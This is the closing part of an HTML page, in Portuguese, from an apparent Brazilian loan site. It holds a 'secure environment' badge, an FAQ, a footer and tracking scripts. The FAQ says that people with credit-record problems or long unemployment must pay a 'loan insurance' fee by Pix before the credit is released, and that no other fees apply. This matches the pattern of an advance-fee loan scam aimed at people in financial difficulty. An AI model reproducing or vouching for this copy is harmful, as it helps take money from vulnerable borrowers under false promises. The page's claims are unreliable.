                                        <path d="M208 40H48a16 16 0 0 0-16 16v56c0 52.72 25.52 84.67 46.93 102.19c23.06 18.86 46 25.26 47 25.53a8 8 0 0 0 4.2 0c1-.27 23.91-6.67 47-25.53C198.48 196.67 224 164.72 224 112V56a16 16 0 0 0-16-16m0 72c0 37.07-13.66 67.16-40.6 89.42a129.3 129.3 0 0 1-39.4 22.2a128.3 128.3 0 0 1-38.92-21.81C61.82 179.51 48 149.3 48 112V56h160ZM82.34 141.66a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32l-56 56a8 8 0 0 1-11.32 0Z">
                                        </path>
                                    </g>
                                </svg> Ambiente seguro </span>
                        </div><a id="utmify" style="display:none;" data-v-0fe1df78="" href="https://unipay-br.org/uni/20-bad-score?utm_source=organicjLj66d651aeeb50e233058b4c0f&utm_campaign=rKm-km-rKm&utm_medium=&utm_content=&utm_term=&subid=organicjLj66d651aeeb50e233058b4c0f&sid2=rKm-km-rKm&subid2=rKm-km-rKm&subid3=&subid4=&subid5=rKm-km-rKm&xcod=organicjLj66d651aeeb50e233058b4c0fhQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR&sck=organicjLj66d651aeeb50e233058b4c0fhQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR"></a><br data-v-0fe1df78="">
                        <div class="insurance-faq" data-v-0fe1df78="" data-v-4ea615b6=""><span class="card-title" data-v-4ea615b6="" data-v-303a1430=""><!--[-->Dúvidas frequentes<!--]--></span>
                            <ul data-v-4ea615b6="">
                                <div class="faq-item" data-v-4ea615b6="" data-v-8c748230="">
                                    <p class="question" weight="light" data-v-8c748230=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--material-symbols-light" data-v-8c748230="" style="" width="1em" height="1em" <="" svg="" viewbox="0 0 24 24">
                                            <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053">
                                            </path>
                                        </svg><span data-v-8c748230="">Todas as pessoas pagam o Seguro
                                            Prestamista?</span></p>
                                    <div class="viewBox" data-v-8c748230="">
                                        <div class="content" data-v-8c748230=""><!--[--> Não. O Seguro Prestamista só
                                            será solicitado para algumas pessoas que apresentarem pendências no CPF ou
                                            outras incompatibilidades para receber o empréstimo. Como por exemplo,
                                            débitos juntos ao SPC Serasa ou desempregados há mais de 6 meses. <!--]-->
                                        </div>
                                    </div>
                                </div>
                                <div class="faq-item" data-v-4ea615b6="" data-v-8c748230="">
                                    <p class="question" weight="light" data-v-8c748230=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--material-symbols-light" data-v-8c748230="" style="" width="1em" height="1em" viewbox="0 0 24 24">
                                            <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053">
                                            </path>
                                        </svg><span data-v-8c748230="">Vou pagar mais alguma taxa além do Seguro?</span>
                                    </p>
                                    <div class="viewBox" data-v-8c748230="">
                                        <div class="content" data-v-8c748230=""><!--[--> Não. O Seguro Prestamista é uma
                                            taxa de caráter excepcional só para algumas pessoas que se enquadram neste
                                            perfil. Após o pagamento do seguro, o crédito será transferido para sua
                                            conta imediatamente. <!--]--></div>
                                    </div>
                                </div>
                                <div class="faq-item" data-v-4ea615b6="" data-v-8c748230="">
                                    <p class="question" weight="light" data-v-8c748230=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--material-symbols-light" data-v-8c748230="" style="" width="1em" height="1em" viewbox="0 0 24 24">
                                            <path fill="currentColor" d="M12 14.379q-.161 0-.298-.053t-.267-.184L7.046 9.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 13.292l4.246-4.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354l-4.389 4.388q-.13.131-.267.184q-.136.053-.298.053">
                                            </path>
                                        </svg><span data-v-8c748230="">Já realizei o pagamento, mas ainda não
                                            recebi</span></p>
                                    <div class="viewBox" data-v-8c748230="">
                                        <div class="content" data-v-8c748230=""><!--[--> Como estamos utilizando a
                                            tecnologia do Pix, o pagamento é reconhecido instantaneamente, e então o
                                            crédito é liberado. <!--]--></div>
                                    </div>
                                </div>
                            </ul>
                        </div><!--]--><!--]-->
                    </div>
                </div><!--]-->
            </main>
            <footer class="footer" data-v-77968890="" data-v-63f14862="">
                <div class="container" data-v-63f14862="" data-v-0041013f=""><!--[-->
                    <p data-v-63f14862="">© 2024 Sim, Crédito Simples.</p>
                    <p data-v-63f14862="">Amador Bueno, nº474. Bloco C. 1º andar - Santo Amaro, São Paulo - SP, CEP 04752-901.</p><!--]-->
                </div>
            </footer>
        </div>
    </div>
    <div id="teleports"></div>

    <script>window.__NUXT__ = {}; window.__NUXT__.config = { public: { apiBase: "https://api.hide-domain.com", adminId: 1, projectId: 1 }, app: { baseURL: "/", buildId: "f7f5e04f-036f-410e-b85c-b41773d9e483", buildAssetsDir: "/_nuxt/", cdnURL: "" } }</script>

<script src="../../scripts/utms/latest-11.js" data-utmify-prevent-subids="" async="" defer=""></script>
<script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "ppobfzii52");
</script>

</body></html>